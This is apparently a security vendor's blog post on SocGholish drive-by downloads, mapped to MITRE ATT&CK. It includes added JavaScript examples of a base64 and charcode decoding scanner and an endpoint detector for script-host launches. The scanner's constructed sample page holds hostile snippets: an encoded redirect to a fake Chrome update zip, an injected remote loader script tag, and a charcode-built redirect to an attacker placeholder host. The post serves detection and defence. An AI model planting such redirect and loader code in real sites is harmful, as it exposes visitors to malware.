SocGholish—a family of malware that has been active since at least 2018 and is associated with the Russia-based threat actor EvilCorp—is frequently used for initial access. This malware family was ranked #6 on Red Canary’s Top 10 real-world threats in their 2023 Threat Detection Report. What makes SocGholish infections so devious is that they are often the result of a drive-by download: a class of attacks capable of installing malware without users’ knowledge or consent. These attacks occur when a user visits a compromised website containing hidden malicious code or links and are often used to target specific populations (e.g., employees of governments or critical infrastructure companies).
Anatomy of drive-by download attacks
Drive-by downloads, which MITRE ATT&CK® catalogues as Drive-by Compromise (T1189), are particularly problematic because they can leverage both the normal behavior of browsers and weaknesses in browser security to deliver malware while evading detection.
Two techniques that often accompany or support such attacks are Obfuscated Files or Information (T1027) and Deobfuscate/Decode Files or Information (T1140). A very common way of obfuscating malicious content and later recovering it is base64, which converts binary data into ASCII text. Base64 lets a payload travel inside contexts that expect text (HTML, JavaScript string literals, HTTP bodies) and defeats detections that match signatures on the raw bytes, since the encoded payload looks like an innocuous run of letters and digits. It is not encryption, however: any scanner that decodes candidate strings before inspecting them sees the original content. This delivery method can be a precursor either to Reflective Code Loading (T1620) for fileless attacks or to User Execution: Malicious File (T1204.002). SocGholish in particular has also been known to employ the Command and Scripting Interpreter (T1059) on the local system (e.g., wscript.exe on Windows) or the script execution capabilities of web browsers to run JavaScript (T1059.007).
Another technique adversaries employ is the redirect, which automatically forwards a user from one website to another. Redirects let them transparently move users from a benign (but compromised) website to a malicious one without consent. They may also obfuscate or encode the redirect, for example by assembling the destination URL at runtime instead of writing it in the clear, so that it is harder for users and for inspection tools to identify.
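The decoding step that the two paragraphs above describe, as an added example that is not code from the original page or from Seraphic Security: a small Node.js scanner that pulls base64 and String.fromCharCode() blobs out of captured page content, decodes them the way the browser itself would, checks the decoded text for drive-by indicators (URLs, script tags, downloadable extensions, dynamic evaluation), and counts redirect primitives in the raw source. The sample page, the hostnames (all under the reserved .invalid TLD), the indicator list and the scoring threshold are constructed for this example.

```javascript
// Added example (not from the original page or from Seraphic Security).
// Scans captured page/script content for the two drive-by tells discussed above:
//   1. base64 blobs (T1027/T1140) that decode to URLs, script tags or loader code,
//   2. redirects, including ones assembled at runtime via atob() or String.fromCharCode().
// Runs offline on Node.js 14+ with no dependencies: node drive-by-scan.js

const b64 = (s) => Buffer.from(s, "utf8").toString("base64");

// Binary data (a fake PNG header) showing that the scanner ignores base64 that does
// not decode to text. Constructed for this example.
const IMAGE_BLOB = Buffer.from([
  0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a, 0x00, 0x00,
  0x00, 0x0d, 0x49, 0x48, 0x44, 0x52, 0x00, 0x00, 0x01, 0x00,
]).toString("base64");

// Constructed sample of a compromised page. Hosts are invented (.invalid TLD).
const SAMPLE_PAGE = `<html><body>
<img src="data:image/png;base64,${IMAGE_BLOB}">
<script>
var t = "${b64("https://update-check.invalid/Chrome.Update.zip")}";
setTimeout(function () { window.location = atob(t); }, 500);
document.write(atob("${b64('<script src="https://cdn-static.invalid/loader.js"></script>')}"));
var h = String.fromCharCode(104,116,116,112,115,58,47,47,101,118,105,108,46,105,110,118,97,108,105,100,47);
location.href = h;
</script>
<p>Welcome to our site</p>
</body></html>`;

// Benign page with the same inline image, for comparison.
const BENIGN_PAGE = `<html><body><img src="data:image/png;base64,${IMAGE_BLOB}"><p>Hello</p></body></html>`;

const B64_RE = /[A-Za-z0-9+/]{20,}={0,2}/g;
const CHARCODE_RE = /String\.fromCharCode\(\s*([\d\s,]+)\)/g;
const REDIRECT_RE = /(?:window\.)?location(?:\.href)?\s*=|location\.(?:replace|assign)\s*\(|http-equiv=["']?refresh/gi;
const DECODER_RE = /\batob\s*\(|String\.fromCharCode\s*\(|\beval\s*\(|document\.write\s*\(/g;

// What we look for once a blob has been decoded. Indicator set is an assumption.
const INDICATORS = [
  { name: "url", re: /https?:\/\/[^\s"'<>]+/i },
  { name: "script-tag", re: /<script[\s>]/i },
  { name: "download-ext", re: /\.(?:zip|js|hta|exe|lnk)\b/i },
  { name: "dynamic-eval", re: /\b(?:eval|Function)\s*\(|document\.write\s*\(/ },
];

// Keep only decodings that are mostly printable ASCII; hashes, keys and images
// decode to bytes and are dropped here.
function looksLikeText(s) {
  if (!s.length) return false;
  const printable = (s.match(/[\x20-\x7e\t\r\n]/g) || []).length;
  return printable / s.length >= 0.9;
}

function decodeBase64Candidate(candidate) {
  if (candidate.length % 4 !== 0) return null; // real base64 comes in 4-char groups
  const buf = Buffer.from(candidate, "base64");
  if (buf.length === 0) return null;
  const text = buf.toString("utf8");
  return looksLikeText(text) ? text : null;
}

function indicatorHits(decoded) {
  return INDICATORS.filter((i) => i.re.test(decoded)).map((i) => i.name);
}

function analyzeContent(text) {
  const findings = [];
  // 1. base64 blobs that decode to text (T1027 on the wire, T1140 in the browser)
  for (const m of text.match(B64_RE) || []) {
    const decoded = decodeBase64Candidate(m);
    if (decoded) findings.push({ kind: "base64", encoded: m.slice(0, 24) + "...", decoded, hits: indicatorHits(decoded) });
  }
  // 2. String.fromCharCode(...) sequences: a different encoder, same idea
  for (const m of text.matchAll(CHARCODE_RE)) {
    const codes = m[1].split(",").map((n) => parseInt(n, 10)).filter(Number.isFinite);
    const decoded = String.fromCharCode(...codes);
    findings.push({ kind: "charcode", decoded, hits: indicatorHits(decoded) });
  }
  // 3. redirect primitives and runtime decoders present in the raw source
  const redirects = text.match(REDIRECT_RE) || [];
  const decoders = text.match(DECODER_RE) || [];
  const score = findings.reduce((s, f) => s + f.hits.length, 0) + redirects.length + decoders.length;
  return { findings, redirects, decoders, score, verdict: score >= 5 ? "suspicious" : "benign" }; // threshold is an assumption
}

console.log(JSON.stringify(analyzeContent(SAMPLE_PAGE), null, 2));
console.log("benign page verdict:", analyzeContent(BENIGN_PAGE).verdict);
```

On the sample page the scanner recovers the zip download URL, the injected loader script tag and the character-code redirect target, and counts the two redirect assignments and four runtime decoder calls; the inline image's base64 is discarded because it does not decode to text. The same candidate-extract, decode, then inspect loop is what separates a content-aware control from one that only pattern-matches the raw bytes.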
The damage
Drive-by download attacks can cause significant damage to a user's device and compromise both corporate and personal information, and users may not become aware of the compromise until it is too late. Once attackers have gained an initial foothold, they can use it to steal users' session cookies (to access other services as that user), conduct reconnaissance and move laterally, or download second-stage payloads such as ransomware.
What to do
As with everything in cybersecurity, keeping browsers updated with the latest security patches is necessary but not sufficient: it raises the bar for exploit-based drive-by downloads but does nothing against a lure that persuades the user to run a downloaded file (T1204.002). User awareness training is also important but may ultimately be ineffective, given the ways in which attackers conceal their actions. Inline security tools such as Secure Web Gateways (SWG) and Network Detection and Response (NDR) may be fooled by the evasiveness of these attacks. Endpoint Detection and Response (EDR) tools may be able to detect them, but by then the initial compromise may already have occurred, and organizations may find themselves in an incident response (IR) or recovery scenario rather than having prevented the attack outright.
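What endpoint-side detection of the execution step mentioned earlier (wscript.exe running a script the user opened, T1204.002 followed by T1059) can look like, as an added example that is not code from the original page or from Seraphic Security. It evaluates Sysmon-style process-creation records and alerts when a Windows script host runs a script from a user-writable location under an interactive parent such as Explorer or a browser, while letting a domain logon script through. The events, hostnames, user names and file names are constructed, and the field names and severity rules are this example's own assumptions, not a vendor's rule set.

```javascript
// Added example (not from the original page or from Seraphic Security).
// Endpoint detection for the execution stage: a user opens a downloaded script and
// the Windows script host runs it (T1204.002 -> T1059). Records mimic Sysmon
// Event ID 1 (process creation) fields; all events below are constructed.
// Run with: node script-host-detect.js

const SCRIPT_HOSTS = /\\(?:wscript|cscript)\.exe$/i;
const SCRIPT_EXT = /\.(?:js|jse|wsf|vbs|vbe)\b/i;
const USER_WRITABLE = /\\Users\\[^\\]+\\(?:Downloads|Desktop|AppData\\Local\\Temp)\\/i;
// Parents that mean a person clicked something: Explorer, browsers, archive tools.
const INTERACTIVE_PARENTS = /\\(?:explorer|chrome|msedge|firefox|7zFM|WinRAR)\.exe$/i;
// Folder Windows Explorer creates when a file is opened straight out of a .zip.
const ZIP_PREVIEW = /\\Temp\d*_[^\\]+\.zip\\/i;

// Constructed sample events (hostname, user and file names are invented).
const EVENTS = [
  // 1: script in Downloads, double-clicked in Explorer
  { eventId: 1, host: "WS-042", user: "CORP\\jdoe",
    image: "C:\\Windows\\System32\\wscript.exe", parent: "C:\\Windows\\explorer.exe",
    cmdline: '"C:\\Windows\\System32\\wscript.exe" "C:\\Users\\jdoe\\Downloads\\Update.js"' },
  // 2: script opened directly from inside a zip archive
  { eventId: 1, host: "WS-042", user: "CORP\\jdoe",
    image: "C:\\Windows\\System32\\cscript.exe", parent: "C:\\Windows\\explorer.exe",
    cmdline: '"C:\\Windows\\System32\\cscript.exe" "C:\\Users\\jdoe\\AppData\\Local\\Temp\\Temp1_Update.zip\\Update.js"' },
  // 3: legitimate logon script from a domain share, non-interactive parent
  { eventId: 1, host: "WS-042", user: "CORP\\jdoe",
    image: "C:\\Windows\\System32\\wscript.exe", parent: "C:\\Windows\\System32\\userinit.exe",
    cmdline: 'wscript.exe //B "\\\\corp.invalid\\netlogon\\map-drives.vbs"' },
  // 4: unrelated process from the same user session
  { eventId: 1, host: "WS-042", user: "CORP\\jdoe",
    image: "C:\\Windows\\System32\\notepad.exe", parent: "C:\\Windows\\explorer.exe",
    cmdline: "notepad.exe C:\\Users\\jdoe\\Downloads\\notes.txt" },
];

// Returns an alert object for a suspicious script-host launch, otherwise null.
function evaluateProcessEvent(e) {
  if (e.eventId !== 1 || !SCRIPT_HOSTS.test(e.image)) return null;
  const reasons = [];
  if (SCRIPT_EXT.test(e.cmdline)) reasons.push("script-file-argument");
  if (USER_WRITABLE.test(e.cmdline)) reasons.push("user-writable-path");
  if (ZIP_PREVIEW.test(e.cmdline)) reasons.push("run-from-zip-preview");
  if (INTERACTIVE_PARENTS.test(e.parent)) reasons.push("interactive-parent");
  // Severity rules are an assumption: a user-writable script started by an
  // interactive parent is the SocGholish-style pattern; a script host launched by
  // a logon process from a system or network path is normal administration.
  let severity = null;
  if (reasons.includes("user-writable-path") && reasons.includes("interactive-parent")) severity = "high";
  else if (reasons.length >= 2) severity = "medium";
  return severity && { host: e.host, user: e.user, severity, reasons, cmdline: e.cmdline };
}

function detectScriptExecution(events) {
  return events.map(evaluateProcessEvent).filter(Boolean);
}

console.log(JSON.stringify(detectScriptExecution(EVENTS), null, 2));
```

Of the four constructed events only the two launched from Downloads and from the zip preview folder are alerted on; the logon script has a script argument but no user-writable path and no interactive parent, so it scores too low. In production the same logic belongs in the EDR or SIEM rule language, enriched with the child processes and network connections that follow the script host, which is where the second-stage download shows up.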
Seraphic Security prevents browser exploitation and can block other forms of web-based attacks with unique Prevention and Detection Engines that operate directly in the browser and can reduce the threat of drive-by downloads. To learn more, visit our Safe Browsing Use-case page, our Product page, or request a demo.